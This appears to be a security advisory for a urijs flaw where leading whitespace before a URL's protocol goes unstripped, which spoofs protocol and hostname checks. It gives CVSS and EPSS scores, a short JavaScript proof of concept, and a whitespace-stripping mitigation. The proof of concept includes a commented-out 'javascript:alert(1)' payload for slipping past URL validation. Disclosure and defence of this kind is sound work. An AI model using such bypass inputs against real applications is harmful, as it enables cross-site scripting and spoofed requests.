P0cas82EF23B8-7025-49C9-B5FC-1BB9885788E5Protocol/Hostname spoofing via Improper Input Validation
5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
0.001 Low
EPSS
Percentile
40.0%
Description
The uri.js doesn’t remove whitespace characters from the beginning of the protocol, so it doesn’t parse URLs properly. Several methods, including http.get(), location.href, and fetch(), strip the whitespace character in front of the protocol before sending the request.
Proof of Concept
const url = require('urijs');
console.log(new url("\bhttp://google.com"))
// console.log(new url("\bjavascript:alert(1)"))
output
URI {
_string: '',
_parts: {
protocol: undefined,
username: null,
password: null,
hostname: null,
urn: null,
port: null,
path: '\bhttp://google.com',
query: null,
fragment: null,
preventInvalidHostname: false,
duplicateQueryParameters: false,
escapeQuerySpace: true
},
_deferred_build: true
}
Mitigation
function remove_whitespace(url){
const whitespace = /^[\x00-\x20\u00a0\u1680\u2000-\u200a\u2028\u2029\u202f\u205f\u3000\ufeff]+/;
url = url.replace(whitespace, '')
return url
}
Write and use a function to remove white space characters as above.
Related
5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
0.001 Low
EPSS
Percentile
40.0%